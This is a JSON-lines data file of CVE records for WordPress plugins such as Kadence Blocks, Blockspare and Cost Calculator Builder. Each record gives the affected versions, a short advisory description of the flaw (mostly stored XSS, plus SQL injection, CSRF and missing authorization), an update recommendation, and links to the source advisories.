{"CVE_ID":"CVE-2024-8325","slug":"blockspare","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The Blockspare: Gutenberg Blocks & Patterns for Blogs, Magazines, Business Sites \u2013 Post Grids, Sliders, Carousels, Counters, Page Builder & Starter Site Imports, No Coding Needed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the \u2018blockspare_render_social_sharing_block\u2019 function in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23995c6-989e-48d2-ba60-b0bf7b750245?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c23995c6-989e-48d2-ba60-b0bf7b750245?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145729\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13479","slug":"ltl-freight-quotes-sefl-edition","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The LTL Freight Quotes \u2013 SEFL Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.2.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242634%40ltl-freight-quotes-sefl-edition&new=3242634%40ltl-freight-quotes-sefl-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242634%40ltl-freight-quotes-sefl-edition&new=3242634%40ltl-freight-quotes-sefl-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8322fe81-2c2f-4aa6-b08f-fa5c16e62218?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8322fe81-2c2f-4aa6-b08f-fa5c16e62218?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6810","slug":"clickcease-click-fraud-protection","versionImpact":"3.2.4","versionEndExcluding":"3.2.5","description":"The ClickCease Click Fraud Protection plugin for WordPress is vulnerable to unauthorized access of data due to an improper capability check on the get_settings function in all versions up to, and including, 3.2.4. This makes it possible for authenticated attackers, with author access and above, to retrieve the plugin's configured API keys.","recommendation":"Update to version 3.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d572cac-b8e3-4c52-9b35-80fe5ee9e900?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d572cac-b8e3-4c52-9b35-80fe5ee9e900?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081436\\\/clickcease-click-fraud-protection\\\/trunk\\\/classes\\\/routes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081436\\\/clickcease-click-fraud-protection\\\/trunk\\\/classes\\\/routes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5819","slug":"kadence-blocks","versionImpact":"3.2.45","versionEndExcluding":"3.2.46","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 3.2.45 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7457ce7-8471-415d-8e34-4505aa34fd61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7457ce7-8471-415d-8e34-4505aa34fd61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108332\\\/kadence-blocks\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108332\\\/kadence-blocks\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10892","slug":"cost-calculator-builder","versionImpact":"3.2.42","versionEndExcluding":"3.2.43","description":"The Cost Calculator Builder WordPress plugin before 3.2.43 does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.","recommendation":"Update to version 3.2.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff1f5b84-a8cf-4574-a713-53d35739c6cb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff1f5b84-a8cf-4574-a713-53d35739c6cb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5289","slug":"kadence-blocks","versionImpact":"3.2.42","versionEndExcluding":"3.2.43","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Maps widget parameters in all versions up to, and including, 3.2.42 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9c0ad1e-380e-4b67-b07e-70bf44e4e614?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9c0ad1e-380e-4b67-b07e-70bf44e4e614?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.38\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L226\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.38\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L226\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.42\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.42\\\/includes\\\/blocks\\\/class-kadence-blocks-googlemaps-block.php#L237\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10034","slug":"simply-gallery-block","versionImpact":"3.2.4.2","versionEndExcluding":"3.2.4.3","description":"The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery link text parameter in all versions up to, and including, 3.2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3192798%40simply-gallery-block%2Ftrunk&old=3176753%40simply-gallery-block%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3192798%40simply-gallery-block%2Ftrunk&old=3176753%40simply-gallery-block%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89bd70b2-0b5f-4edb-890b-d291bdb8a851?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89bd70b2-0b5f-4edb-890b-d291bdb8a851?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2434","slug":"wp-nested-pages","versionEndExcluding":"3.2.4","description":"The Nested Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'reset' function in versions up to, and including, 3.2.3. This makes it possible for authenticated attackers, with editor-level permissions and above, to reset plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919175%40wp-nested-pages&old=2814681%40wp-nested-pages&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919175%40wp-nested-pages&old=2814681%40wp-nested-pages&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c3e61e9-3610-41b5-9820-28012dc657fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c3e61e9-3610-41b5-9820-28012dc657fd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/tags\\\/3.2.3\\\/app\\\/Form\\\/Listeners\\\/ResetSettings.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/tags\\\/3.2.3\\\/app\\\/Form\\\/Listeners\\\/ResetSettings.php#L12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3475","slug":"sticky-buttons","versionEndExcluding":"3.2.4","description":"The Sticky Buttons WordPress plugin before 3.2.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged-in admins perform unwanted actions, such as deleting buttons, via CSRF attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf540242-5306-4c94-ad50-782d0d5b127f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf540242-5306-4c94-ad50-782d0d5b127f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10678","slug":"ultimate-blocks","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"The Ultimate Blocks WordPress plugin before 3.2.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342c6a1-4f9a-45f3-911d-0dfee4657243\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342c6a1-4f9a-45f3-911d-0dfee4657243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50459","slug":"wp-stripe-donation","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"Missing Authorization vulnerability in HM Plugin WordPress Stripe Donation and Payment Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Stripe Donation and Payment Plugin: from n\/a through 3.2.3.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-stripe-donation\\\/wordpress-aidwp-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-stripe-donation\\\/wordpress-aidwp-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8726","slug":"mailchimp-forms-by-mailmunch","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"The MailChimp Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1a1c5e7-75a4-4ca5-9707-4076b92e0c33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1a1c5e7-75a4-4ca5-9707-4076b92e0c33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189361%40mailchimp-forms-by-mailmunch&new=3189361%40mailchimp-forms-by-mailmunch&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189361%40mailchimp-forms-by-mailmunch&new=3189361%40mailchimp-forms-by-mailmunch&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13749","slug":"stafflist","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"The StaffList plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing or incorrect nonce validation on the 'stafflist' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232922%40stafflist&new=3232922%40stafflist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232922%40stafflist&new=3232922%40stafflist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8da640d-8965-45bb-be68-57d4eb598759?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8da640d-8965-45bb-be68-57d4eb598759?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8379","slug":"cost-calculator-builder","versionImpact":"3.2.38","versionEndExcluding":"3.2.39","description":"The Cost Calculator Builder WordPress plugin before 3.2.29 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.","recommendation":"Update to version 3.2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3463d5a-8215-4958-a6c0-039681c35a50\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3463d5a-8215-4958-a6c0-039681c35a50\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6884","slug":"kadence-blocks","versionImpact":"3.2.28","versionEndExcluding":"3.2.39","description":"The Gutenberg Blocks with AI by Kadence WP WordPress plugin before 3.2.39 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1768de0c-e4ea-4c98-abf1-7ac805f214b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1768de0c-e4ea-4c98-abf1-7ac805f214b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4863","slug":"kadence-blocks","versionImpact":"3.2.38","versionEndExcluding":"3.2.39","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018titleFont\u2019 parameter in all versions up to, and including, 3.2.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e0cde65-f75c-4602-bffe-97b391a428b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e0cde65-f75c-4602-bffe-97b391a428b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L276\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L276\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091170\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091170\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4208","slug":"kadence-blocks","versionImpact":"3.2.37","versionEndExcluding":"3.2.38","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the typer effect in the advanced heading widget in all versions up to, and including, 3.2.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ea2bb8c-cc8b-49de-9c8e-2c8c0569f4ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ea2bb8c-cc8b-49de-9c8e-2c8c0569f4ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3189","slug":"kadence-blocks","versionImpact":"3.2.37","versionEndExcluding":"3.2.38","description":"The Gutenberg Blocks by Kadence Blocks \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Testimonial', 'Progress Bar', 'Lottie Animations', 'Row Layout', 'Google Maps', and 'Advanced Gallery' blocks in all versions up to, and including, 3.2.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766b0bde-c555-40c1-b174-20045bd89c11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766b0bde-c555-40c1-b174-20045bd89c11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-lottie-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-lottie-block.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076712%40kadence-blocks&new=3076712%40kadence-blocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076712%40kadence-blocks&new=3076712%40kadence-blocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4057","slug":"kadence-blocks","versionImpact":"3.2.36","versionEndExcluding":"3.2.37","description":"The Gutenberg Blocks with AI by Kadence WP WordPress plugin before 3.2.37 does not validate and escape some of its block attributes before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da4d4d87-07b3-4f7d-bcbd-d29968a30b4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da4d4d87-07b3-4f7d-bcbd-d29968a30b4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4481","slug":"kadence-blocks","versionImpact":"3.2.36","versionEndExcluding":"3.2.37","description":"The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' attribute of the plugin's blocks in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad0e4292-d890-499b-b70a-ed638d5b8ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad0e4292-d890-499b-b70a-ed638d5b8ee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4209","slug":"kadence-blocks","versionImpact":"3.2.36","versionEndExcluding":"3.2.37","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown timer in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cff2e5be-0de0-4e62-a881-6156760b7d99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cff2e5be-0de0-4e62-a881-6156760b7d99?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/dist\\\/blocks-countdown.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/dist\\\/blocks-countdown.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13563","slug":"front-end-only-users","versionImpact":"3.2.30","versionEndExcluding":"3.2.31","description":"The Front End Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's forgot-password shortcode in all versions up to, and including, 3.2.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_Forgot_Password.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_Forgot_Password.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240349\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240349\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-end-only-users\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-end-only-users\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51f3497f-c599-4d47-bd5a-94e1679a0025?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51f3497f-c599-4d47-bd5a-94e1679a0025?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5815","slug":"traffic-monitor","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Traffic Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tfcm_maybe_set_bot_flags() function in all versions up to, and including, 3.2.2. This makes it possible for unauthenticated attackers to disable bot logging.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-monitor\\\/trunk\\\/traffic-monitor.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-monitor\\\/trunk\\\/traffic-monitor.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309996%40traffic-monitor&new=3309996%40traffic-monitor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309996%40traffic-monitor&new=3309996%40traffic-monitor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538669c7-3237-4059-85dc-4f4af1ff5a19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538669c7-3237-4059-85dc-4f4af1ff5a19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
